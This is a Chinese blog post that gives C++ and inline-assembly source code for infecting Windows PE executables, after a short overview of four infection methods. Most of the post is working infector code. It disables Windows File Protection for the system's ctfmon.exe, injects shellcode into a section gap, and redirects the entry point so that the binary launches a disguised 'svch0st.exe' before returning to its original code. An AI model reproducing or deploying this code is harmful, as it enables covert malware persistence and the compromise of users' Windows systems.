PE文件的感染C++源代码

最新推荐文章于 2025-07-11 14:18:41 发布

杨航 AI

最新推荐文章于 2025-07-11 14:18:41 发布

阅读量2.9k

点赞数

本文深入探讨了如何通过导入表感染、导入地址感染、修改入口函数地址和修改快捷方式文件等方法来感染PE文件，并提供了具体的C++源代码实现。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

PE文件的感染C++源代码

PE文件规定了可执行文件的格式，凡是符合此格式的文件都能在windows系统上运行。PE文件的格式暂且不谈，说一些感染PE文件的几种途径。

导入表感染。这个涉及比较复杂的操作，首先，要自行写一个dll文件，提供程序中对原dll引用的所有函数，然后增加一个节区，修改ImportAddress中的地址，使其指向新增加的节，这样，程序加载后，只要调用相关函数，就会先执行自己写的dll，执行完后，再跳转到原代码人口处执行。

导入地址感染。这个相对简单些，在PE文件头部分，IMAGE_OPTION_HEADER中有个ImportAddress目录，这个目录中只是一些jmp指令，我们可以修改jmp指令跳转的地址，使其指向在PE文件中我们新增加的代码。这需要在原PE文件中增加代码，PE文件在硬盘上默认200H字节对齐，一般存有空隙，如果代码量小，不用增加新节就可以插入代码。

修改入口函数地址。这个是最省事的办法，在原PE文件中新增加一个节，计算新节的RVA，然后修改入口代码，使其指向新增加的节。当然，如果.text节空隙足够大的话，不用添加新节也可以。

修改快捷方式文件。如果PE文件存在快捷方式，可以先行感染快捷方式，使快捷方式指向自己写的程序，自写程序启动后，再执行真正的PE文件。这种做法比较猥琐，而且不可靠。

#include <stdio.h>
#include<windows.h>
#include<TCHAR.h>
#include <shlwapi.h>

typedef DWORD WINAPI SfcFileException(DWORD dwUnknown0, PWCHAR pwszFile, DWORD dwUnknown1);

void KillSFC()
{
    WCHAR drvpath[MAX_PATH]={0};

    GetSystemDirectoryW(drvpath,sizeof(drvpath));
    wcscat(drvpath,L"\\ctfmon.exe");
    HMODULE hModule = LoadLibraryA("SFC.DLL");
    SfcFileException *SfcFileExc = (SfcFileException (__stdcall *))GetProcAddress(hModule,(LPCSTR)5);
    SfcFileExc(0,drvpath,-1);
FreeLibrary(hModule);
    return;
}

int InjectPE()
{
IMAGE_NT_HEADERS ntHeader;
IMAGE_SECTION_HEADER SecInject;
FILE* pFile;
char systemPath[MAX_PATH];
GetSystemDirectoryA(systemPath,sizeof(systemPath));
char szFileName[MAX_PATH] = "\\ctfmon.exe";
strcat(systemPath,szFileName);
strcpy(szFileName,systemPath);

KillSFC();

if((pFile=fopen(szFileName,"rb+"))==NULL)//打开文件失败则退出
{
    printf("打开文件失败\n");
    return 0;
}

fseek(pFile,0x3c,0);
DWORD pNT;
fread(&pNT,sizeof(DWORD),1,pFile);
fseek(pFile,pNT,SEEK_SET);
fread(&ntHeader,sizeof(IMAGE_NT_HEADERS),1,pFile); //读取NT头

//保存旧入口地址
int sectionNum = ntHeader.FileHeader.NumberOfSections;
int OldEntryPoint = ntHeader.OptionalHeader.AddressOfEntryPoint;

goto shellend;
__asm
{
    shell: PUSHAD
    MOV EAX,DWORD PTR FS:[30H] ;FS:[30H]指向PEB
    MOV EAX,DWORD PTR [EAX+0CH] ;获取PEB_LDR_DATA结构的指针
    MOV EAX,DWORD PTR [EAX+1CH] ;获取LDR_MODULE链表表首结点的inInitializeOrderModuleList成员的指针
    MOV EAX,DWORD PTR [EAX] ;LDR_MODULE链表第二个结点的inInitializeOrderModuleList成员的指针
    MOV EAX,DWORD PTR [EAX+08H] ;inInitializeOrderModuleList偏移8h便得到Kernel32.dll的模块基址
    MOV EBP,EAX    ; 将Kernel32.dll模块基址地址放至kernel中
    MOV EAX,DWORD PTR [EAX+3CH] ;指向IMAGE_NT_HEADERS
    MOV EAX,DWORD PTR [EBP+EAX+120] ;指向导出表
    MOV ECX,[EBP+EAX+24] ;取导出表中导出函数名字的数目
    MOV EBX,[EBP+EAX+32]    ;取导出表中名字表的地址
    ADD EBX,EBP
    PUSH WORD PTR 0X00      ;构造GetProcAddress字符串
    PUSH DWORD PTR 0X73736572
    PUSH DWORD PTR 0X64644163
    PUSH DWORD PTR 0X6F725074
    PUSH WORD PTR 0X6547
    MOV EDX,ESP
    PUSH ECX

F1:
    MOV EDI,EDX
    POP ECX
    DEC ECX
    TEST ECX,ECX
    JZ EXIT
    MOV ESI,[EBX+ECX*4]
    ADD ESI,EBP
    PUSH ECX
    MOV ECX,15
    REPZ CMPSB
    TEST ECX,ECX
    JNZ F1

    POP ECX
    MOV ESI,[EBP+EAX+36] ;取得导出表中序号表的地址
    ADD ESI,EBP
    MOVZX ESI,WORD PTR[ESI+ECX*2]    ;取得进入函数地址表的序号
    MOV EDI,[EBP+EAX+28] ;取得函数地址表的地址
    ADD EDI,EBP
    MOV EDI,[EDI+ESI*4]    ;取得GetProcAddress函数的地址
    ADD EDI,EBP
    PUSH WORD PTR 0X00
    PUSH DWORD PTR 0X636578 ;构造WinExec字符串
    PUSH DWORD PTR 0X456E6957
    PUSH ESP
    PUSH EBP      ;
    CALL EDI      ;调用GetProcAddress取得WinExec函数的地址


    XOR     EBX,EBX
    PUSH    EBX
    PUSH WORD PTR 0X00    ;构造svch0st.exe符串.
    PUSH DWORD PTR 0X455845
    PUSH    DWORD PTR 0X2E545330
    PUSH DWORD PTR 0X48435653
    PUSH ESP
    CALL EAX
EXIT: ADD ESP,40      ;平衡堆栈
    POPAD
}
shellend:
    char *pShell;
    int nShellLen;

__asm
{
    LEA EAX,shell
    MOV pShell,EAX;
    LEA EBX,shellend
    SUB EBX,EAX
    MOV nShellLen,EBX
}

int i;

for(i=0;i<sectionNum;i++)
{
   fseek(pFile,pNT+248+i*40,SEEK_SET); //定位到节表开始处
   fread(&SecInject,sizeof(IMAGE_SECTION_HEADER),1,pFile);
   DWORD pInfect = SecInject.PointerToRawData + SecInject.Misc.VirtualSize+5;
   WORD Sign;
   fseek(pFile,pInfect,SEEK_SET);
   fread(&Sign,sizeof(WORD),1,pFile);
   if(Sign == 0x1122) //已经感染过,结束程序.
   {
     //MessageBoxA(NULL,"已感染过","msg",MB_OK);
     return 0;
   }
   if((int)(SecInject.SizeOfRawData-SecInject.Misc.VirtualSize)>nShellLen)
    break;
}

if(i>=sectionNum)
{
printf("找不到适合插入的节");
return 0;
}
DWORD lpCodeRVA = SecInject.VirtualAddress + SecInject.Misc.VirtualSize;
DWORD lpCodeOffs = SecInject.PointerToRawData + SecInject.Misc.VirtualSize; //添加代码的文件偏移
/*修改入口点地址并写回NT HEADER中*/
ntHeader.OptionalHeader.AddressOfEntryPoint = lpCodeRVA;
fseek(pFile,pNT,SEEK_SET);
fwrite(&ntHeader,sizeof(IMAGE_NT_HEADERS),1,pFile);

SecInject.Characteristics = SecInject.Characteristics|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_EXECUTE; //节属性改成可读、可执行
SecInject.Misc.VirtualSize += nShellLen;
fseek(pFile,pNT+248+i*40,SEEK_SET); //文件指针移动到SecInject的首址
fwrite(&SecInject,sizeof(IMAGE_SECTION_HEADER),1,pFile); //将修改后的节信息写回文件中

/*写入SHELLCODE*/
fseek(pFile,lpCodeOffs,SEEK_SET); //定位到添加代码的文件偏移
for(i=0;i<nShellLen;i++)
fputc(pShell[i],pFile);
//SHELLCODE之后是跳转到原OEP的指令

BYTE jmp = 0xE9;
OldEntryPoint = OldEntryPoint-(lpCodeRVA+nShellLen)-5;
fwrite(&jmp, sizeof(jmp), 1, pFile);
fwrite(&OldEntryPoint, sizeof(OldEntryPoint), 1, pFile);
WORD InfectSign=0x1122; // 感染标志
fwrite(&InfectSign,sizeof(WORD),1,pFile);
fclose(pFile);
//MessageBoxA(NULL,"注入成功","INFO",MB_OK);
return 0;
}